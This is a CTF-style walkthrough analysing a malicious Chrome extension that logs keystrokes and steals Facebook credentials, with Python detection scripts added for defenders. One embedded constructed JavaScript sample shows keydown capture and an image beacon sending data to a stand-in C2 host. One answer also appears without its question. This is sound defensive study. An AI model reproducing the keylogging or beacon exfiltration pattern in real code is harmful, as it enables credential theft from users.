FakeGPT

Overview

Room link: https://cyberdefenders.org/blueteam-ctf-challenges/fakegpt/

We are given some files that make up a .crx file.

.
├── app.js
├── crypto.js
├── img.GIF
├── loader.js
├── manifest.json
└── ui.html

One way to analyze a .crx file is to upload it to crxviewer.com. Since we are only given the inner files, we can turn them back into a .crx by going to chrome://extensions, clicking "Pack extension" and selecting the folder containing the files.

If packing fails, adjust the folder layout according to Chrome's error message. Remember that manifest.json is the "main" file that describes how the extension runs, while app.js provides the main logic. In addition to that, loader.js "loads" the extension and disables it when necessary.

.crx creation success! Although we could just read the scripts directly to analyze the extension, it's worth learning how to pack and unpack extensions, since it helps in understanding how they work.

Upload the .crx to crxviewer.com and let's move on to the questions.

1. Which encoding method does the browser extension use to obscure target URLs, making them more difficult to detect during analysis?

The target URL(s) can be found in app.js. The URL is encoded in base64.

Answer: Base64

2. Which website does the extension monitor for data theft, targeting user accounts to steal sensitive information?

This is a follow-up to question #1. The base64 text decodes to www.facebook.com.

Answer: www.facebook.com
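Decoding one literal by hand is fine for a single file, but it helps to have a small triage script that pulls every base64-looking string out of an extension's JavaScript and reports the ones that decode to a hostname or URL. The script below is an added example for this walkthrough, not code from the challenge files; the JavaScript it scans is a constructed sample built to show the same encoding pattern, and the c2.example.invalid domain in it is made up.

```python
"""Static triage helper: find base64 string literals in extension JavaScript
and decode those that hide a hostname or URL. Added example for the
walkthrough, not code from the FakeGPT challenge files; the JS below is a
constructed sample that uses the same encoding pattern."""
import base64
import binascii
import re
from dataclasses import dataclass

# Quoted base64-looking literals, at least 12 characters, optional '=' padding
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{12,}={0,2})["\']')
# Decoded text that looks like a bare hostname or an http(s) URL
HOST_OR_URL = re.compile(r'^(https?://)?([a-z0-9-]+\.)+[a-z]{2,}(/\S*)?$', re.I)


@dataclass
class Finding:
    line: int       # 1-based line in the scanned source
    literal: str    # the base64 token as it appears in the code
    decoded: str    # what it decodes to


def decode_candidate(token: str):
    """Strictly decode a token; return printable UTF-8 text or None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_hidden_targets(js_source: str) -> list:
    """Return every base64 literal whose decoded value looks like a host or URL."""
    findings = []
    for lineno, line in enumerate(js_source.splitlines(), 1):
        for match in B64_LITERAL.finditer(line):
            decoded = decode_candidate(match.group(1))
            if decoded and HOST_OR_URL.match(decoded.strip()):
                findings.append(Finding(lineno, match.group(1), decoded))
    return findings


# Constructed sample: the target site is stored base64-encoded, as in the walkthrough
SAMPLE_JS = (
    "// constructed sample modelled on the pattern in the walkthrough\n"
    'const target = atob("' + base64.b64encode(b"www.facebook.com").decode() + '");\n'
    'const greeting = "Hello, world";\n'
    'const c2 = atob("' + base64.b64encode(b"https://c2.example.invalid/upload").decode() + '");\n'
    "if (location.hostname === target) { start(); }\n"
)

if __name__ == "__main__":
    for f in find_hidden_targets(SAMPLE_JS):
        print(f"line {f.line}: {f.literal} -> {f.decoded}")
```

Strict decoding (validate=True) plus the hostname check keeps the noise down: ordinary string literals and random identifiers either fail to decode or decode to something that is not a domain, so what remains is a short list of candidate targets and C2 addresses to check against the extension's network code.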

3. Which type of HTML element is utilized by the extension to send stolen data?

In app.js, we see a function that sends data to the C2 server. The data is not sent directly. Instead, it's encrypted and then sent through an image element, probably to bypass detection.

Answer: <img>

4. What is the first specific condition in the code that triggers the extension to deactivate itself?

The malware tries to disable itself when it's run in a lab environment. This is done to prevent analysis. As shown by the code in loader.js, the malware detects a lab environment using navigator.plugins.length === 0 as one of the conditions.

Answer: navigator.plugins.length === 0

5. Which event does the extension capture to track user input submitted through forms?

This part of the code in app.js captures the victim's username and password as they log into the target website (such as facebook.com). The data is taken from the login form at the moment the victim submits it.

Answer: submit

6. Which API or method does the extension use to capture and monitor user keystrokes?

Not only does the code track login forms on the target websites, it also records each keystroke the victim types on those websites. It's basically a keylogger.

Answer: keydown
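The three behaviours from questions 3, 5 and 6 (an image element used as the send channel, a submit handler on forms, and a keydown listener) are cheap to flag statically, and seeing them together in one content script is a strong signal. The scanner below is an added example for this walkthrough, not the challenge's code; the JavaScript it runs over is a constructed sample that reproduces those three patterns, and the c2.example.invalid URL in it is made up.

```python
"""Flag input-capture listeners and image-beacon sinks in extension JavaScript.
Added example for this walkthrough; the JS sample is constructed and is not
the challenge's app.js."""
import re
from collections import defaultdict

# Listener registrations that capture what the user types or submits
LISTENER = re.compile(r'addEventListener\(\s*["\'](submit|keydown|keyup|keypress|input)["\']')
# Inline handler assignments such as form.onsubmit = ...
INLINE_HANDLER = re.compile(r'\.on(submit|keydown|keyup|keypress|input)\s*=')
# An image element being created in script (new Image() or createElement("img"))
IMAGE_SINK = re.compile(r'(new\s+Image\s*\(|createElement\(\s*["\']img["\']\s*\))')
# An image src built from data rather than a fixed URL (concatenation, template, encoding)
SRC_WITH_DATA = re.compile(r'\.src\s*=\s*[^;]*(\+|\$\{|encodeURIComponent|btoa)')


def scan_indicators(js_source: str) -> dict:
    """Return indicator name -> list of 1-based line numbers where it appears."""
    hits = defaultdict(list)
    for lineno, line in enumerate(js_source.splitlines(), 1):
        for m in LISTENER.finditer(line):
            hits[f"listener:{m.group(1)}"].append(lineno)
        for m in INLINE_HANDLER.finditer(line):
            hits[f"listener:{m.group(1)}"].append(lineno)
        if IMAGE_SINK.search(line):
            hits["image_element_created"].append(lineno)
        if SRC_WITH_DATA.search(line):
            hits["img_src_carries_data"].append(lineno)
    return dict(hits)


def is_keylogger_like(hits: dict) -> bool:
    """Input capture plus an image beacon is the combination the walkthrough describes."""
    captures = any(k.startswith("listener:") for k in hits)
    beacon = "image_element_created" in hits and "img_src_carries_data" in hits
    return captures and beacon


# Constructed sample modelled on the behaviour described in questions 3, 5 and 6
SAMPLE_JS = """\
// constructed sample, not the challenge's app.js
document.addEventListener("keydown", (e) => buffer.push(e.key));
form.addEventListener('submit', () => exfiltrate(user.value, pass.value));
function send(payload) {
  const beacon = new Image();
  beacon.src = "https://c2.example.invalid/p.gif?d=" + encodeURIComponent(payload);
}
"""

if __name__ == "__main__":
    found = scan_indicators(SAMPLE_JS)
    for name, lines in sorted(found.items()):
        print(f"{name}: lines {lines}")
    print("keylogger-like:", is_keylogger_like(found))
```

Each indicator on its own is common in benign code (plenty of legitimate pages listen for keydown, and tracking pixels set an image src), which is why the verdict function only fires on the combination; the line numbers it reports are the places to read next in the real file.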

7. What is the domain where the extension transmits the exfiltrated data?

We can see this from the sendToServer function code.

Answer: Mo.Elshaheedy.com

8. Which function in the code is used to exfiltrate user credentials, including the username and password?

This is pretty obvious from the function name, but we can always confirm by looking at the instructions inside the function.

Answer: exfiltrateCredentials(username, password);

9. Which encryption algorithm is applied to secure the data before sending?

We can see from the code that the exfiltrated data is first encrypted using the function encryptPayload. The encryption function is written in crypto.js. The encryption algorithm is AES.

Answer: AES

This is more of a general-knowledge question about how browsers work. Session-related data and authentication information are stored in cookies and the browser's local storage. We can look at manifest.json and see that "cookies" is one of the permissions granted to the extension.

Answer: cookies
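Checking manifest.json for the "cookies" permission is the kind of review that is worth automating across every extension in an environment: the permission list and the host patterns together say whether an extension can reach session data at all. The script below is an added example for this walkthrough, not the challenge's manifest or code; the manifest it parses is a constructed sample that reuses the file names listed at the top of the page, and the sensitive-permission descriptions are my own summary.

```python
"""Triage a Chrome extension manifest for permissions that let an extension
reach session data. Added example for this walkthrough; the manifest below
is a constructed sample, not the FakeGPT challenge's manifest.json."""
import json

# Permissions worth a second look and the capability each grants (my summary)
SENSITIVE_PERMISSIONS = {
    "cookies": "read and modify cookies for the hosts it has access to",
    "webRequest": "observe requests the browser makes",
    "webRequestBlocking": "modify or block requests in flight",
    "tabs": "read URLs and titles of open tabs",
    "history": "read browsing history",
    "clipboardRead": "read the clipboard",
    "nativeMessaging": "talk to a native host process",
    "<all_urls>": "access every site (manifest v2 form)",
}
# Host patterns that amount to 'every site'
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def triage_manifest(manifest_text: str) -> dict:
    """Summarise the permission surface described by a manifest.json string."""
    m = json.loads(manifest_text)
    perms = set(m.get("permissions", [])) | set(m.get("optional_permissions", []))
    hosts = set(m.get("host_permissions", []))                        # manifest v3
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}    # manifest v2
    matches = {pat for cs in m.get("content_scripts", []) for pat in cs.get("matches", [])}
    flagged = sorted(p for p in perms if p in SENSITIVE_PERMISSIONS)
    return {
        "manifest_version": m.get("manifest_version"),
        "flagged_permissions": flagged,
        "flagged_reasons": {p: SENSITIVE_PERMISSIONS[p] for p in flagged},
        "broad_host_access": sorted(h for h in hosts if h in BROAD_HOSTS),
        "content_script_matches": sorted(matches),
        # The combination behind the last answer: cookie access plus host access
        # to the sites whose sessions those cookies belong to.
        "can_reach_session_data": "cookies" in perms and bool(hosts),
    }


# Constructed sample manifest reusing the file names listed at the top of the page
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "constructed sample",
    "version": "1.0",
    "permissions": ["cookies", "storage", "tabs"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "loader.js"},
    "content_scripts": [{"matches": ["*://*.facebook.com/*"], "js": ["app.js"]}],
})

if __name__ == "__main__":
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
```

The function handles both manifest versions, since v2 lists host patterns under "permissions" while v3 moves them to "host_permissions"; "cookies" with no host access is far less interesting than "cookies" combined with <all_urls>, which is what the verdict field encodes.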
